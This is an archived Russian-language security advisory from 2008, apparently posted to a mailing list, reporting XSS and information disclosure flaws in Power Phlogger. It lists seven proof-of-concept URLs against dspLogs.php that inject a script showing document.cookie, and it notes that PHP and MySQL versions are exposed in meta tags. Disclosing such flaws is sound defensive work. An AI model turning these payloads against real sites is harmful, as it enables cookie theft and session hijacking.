Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19067
HistoryFeb 12, 2008 - 12:00 a.m.

Vulnerabilities in Power Phlogger

2008-02-1200:00:00
vulners.com
12

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting и Information disclosure
уязвимостях в Power Phlogger.

XSS:

В скрипте dspLogs.php.

http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information disclosure:

На странице http://site/index.php (как и на других страницах приложения) выводится
важная информация о системе (версии PHP и MySQL, как и версия веб сервера с его
банера) в мета-тегах.

<meta name="PHP Version" content="…" />
<meta name="MYSQL Version" content="…" />

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1824/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua